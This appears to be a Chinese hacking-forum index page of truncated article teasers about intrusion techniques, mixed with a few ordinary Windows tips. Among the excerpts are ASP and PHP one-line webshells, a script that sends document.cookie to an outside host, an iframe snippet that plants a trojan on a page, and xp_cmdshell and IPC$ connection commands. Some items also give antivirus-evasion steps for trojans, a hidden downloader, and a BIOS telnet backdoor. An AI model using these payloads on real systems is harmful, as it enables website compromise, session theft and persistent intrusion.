很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”，那么什么是 ...……

现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。 　　1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络 　 ...……

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把 ...……

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹程序安装成服务，并设置为自动启动。启动之后写入一段代码到 ...……

常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法 绝招一：快速搞定瑞星文件查杀 操作步骤： 　第一步：用OD载入，来到程序的入口点。 ...……

偷取Cookie，通过以下脚本引入一个js，document.write(script src=XX.js/script)，然后js内容为： var code;　　　　　　　　　 var target = http://www.xxx.net/cookie.asp?; info=escape(document.location+@@ ...……

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4, ...……

FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUploadType=ImageCurrentFolder=%2F http://www.xxx.com/fckeditor/editor/file ...……

影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin的./phpmyadmin/libraries/db_table_exi ...……

章出处:C.R.S.T 作者:sai52 blog:www.sai52.com 今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。 思路都一样，在拥有file权限的前提下，读取 ...……

用windows自带功能做永不被查杀，超小体积的下载者！ 利用windows自带功能做永不被查杀，超小体积的下载者！ 今天自己搞出来个永不会被杀的下载者 好东西就要拿出来和大家分享,,, 把制作过程告诉大家吧.... 看不 ...……

得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离，结果不一样就是分离的 点评： 在实际的渗透过程中，我们常常会困惑数据库和web究竟是否在一台 ...……

asp一句话 %execute(request(1))% php一句话 ?php eval($_POST);? aspx一句话 script language=C# runat=server WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(add6bb58e139be10); /……

scriptdocument.write('img src=http://url/news.asp?msg='+document.cookie+' width=0 height=0 border=0 /');/script news.asp代码： % msg=Request.ServerVariables(QUERY_STRING) testfile=Server.MapPath( ...……

该项目仅为实验性项目，主要目的是想隐藏一个Telnet后门在主板的BIOS内，并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环 ...……

i 首先请大家看这么一个简单的小程序： #includestdio.h voidmain() { inti,b; for(i=0;i=10;&……

文件夹遍历技术是一种非常有用的技术，在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。 文件夹遍历技术的核心就是使用递归算法，关于递归算法，我这里就不多介绍了，不明白的 ...……

呆在家中上网聊天实在不是一件惬意的事：每一天打开QQ，迎接我的都是一串一串的广告国庆黄金周，连广告也不放过！：（ 无奈，打开Visual C++，开始了我的反骚扰之路。 首先我面对的问题是：QQ一共有几种广告，我 ...……

　　本地连接突然受限 　　单位局域网中有一台旧计算机，平时安装使用的是Windows XP系统，在该系统环境下该计算机可以正常访问网络;后来，某位同事为了能够在第一时间体验到Windows Vista系统的精彩，特意对该计 ...……

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -SGNETDATA/GNETDATA -Usa -P' /*********** 导入Excel Select * FROM OpenDataSource( 'Microsoft.Jet.OL ...……

　第一招:屏幕保护 　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会 ...……

看了你昨天的留言，我才知道原来木马可以用这么多方式传播呀。那我想问你一件事，常在河边走，哪有不湿鞋，你经常黑别人，难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢? 　　就像你说的那样，我也中过木马 ...……

　对于进程这个概念，许多电脑用户都没有给予太多关注。在很多人印象里，只知道结束进程可以杀死程序，至于哪些进程对应哪些程序，究竟什么样的进程该杀，什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大 ...……

《黑客手册》样刊里面，oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码： 　　程序代码 　　% 　　username=trim(Request.Form(username)) 　　password=trim(Request.Form(password)) 　　sql= ...……

　　应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散，但它们也同样会造成很多问题，从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是 ...……

　　net use\192.168.0.1ipc$Content$nbsp; /user:administrator 　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。 　　首先，连接的命令是： 　　 ...……

　Win2k的缺省安装很容易被攻击者取得帐号列表，即使安装了最新的Service ack也是如此。 　　方案一 　　1.打补丁 　　微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用开始-WindowsUpd ...……

今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息， 　　包括它的类型，用户列表，目录，端口，漏洞等等。 　　首先我们我们要找一台主机来练手，随便挑吧！www.dddd.com(乱说的)第一部，呵呵， ...……

用Google浏览器浏览此篇文章，并点击下面的字符： 　　EVIL:% 　　是不是很爽，^_^。……

犀利的 oracle 注入技术 　　原文发表在黑客手册 　　linx 2008.1.12 　　介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 　　以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.D ...……

　测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动） 　　一．xp_cmdshell 　　EXEC master..xp_cmdshell ipconfig 　　开启xp_cmdshell: 　　 To allow advanced options to be changed. 　 ...……

　　【赛迪网-IT技术报道】U盘 如今可以说非常普及了，不过，如果只是把它用来存储数据的话，也许有点可惜了。其实，我们还可以让U盘发挥更大的能量！今天小编教你一招，能让你的U盘代 替登录系统的密码，只有当你插 ...……

1，挂马的N种方法 　　(1) HTML挂马法。 　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像iframe src=http://www.xxx.com/horse.html width=0 height=0/iframe。查看站点是否被挂，一般是查找一下关键 ...……

1.名称：如何制作图片ASP木马 　　建一个asp文件，内容为!--＃i nclude file=ating.jpg-- 　　找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜 ...……

　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他噶端口。而我们要知道距噶IP，先可以连接他。123就是他机器上开的端口 　　由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有 ...……

用WinHEX打开QQ游戏目录Tencent＼QQGame＼common＼Utility.dll文件 　　搜索3DB70000008BCE7507 　　将其修改为3DB70000008BCEEB07 　　保存后，再打开QQ游戏大厅，发现已经可以多开了！ ...……

　★巧用回收站的编辑菜单 　　如果要删除回收站中的大多数文件，不用费劲地将它们一一选中，可以首先选中不删除的文件；然后在菜单中点击编辑反向选择，则系统将选中需要删除的文件；最后单 ...……

　　即使是很好的实现了TCP/IP协议，由于它本身有着一些不安全的地方，从而可以对TCP/IP网络进行攻击。这些攻击包括序列号欺骗，路由攻击，源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外，还介绍怎样防止这个 ...……

　 LAN　　　　局域网 　　WAN　　　 广域网 　　UTP　　　　非屏蔽的双绞线 　　STP　　　　屏蔽的双绞线 　　ATM　　　　异步传输模式 　　FDDI　　　 光纤分布式数据接口 　　CSMA/CD　载波侦听多路访问方 ...……

　　个人主机入侵网络攻击的步骤 　　第一步：隐藏自已的位置 　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽 量通过跳板或肉鸡展开攻击。所谓肉鸡通常是指，HACK实现通过后 ...……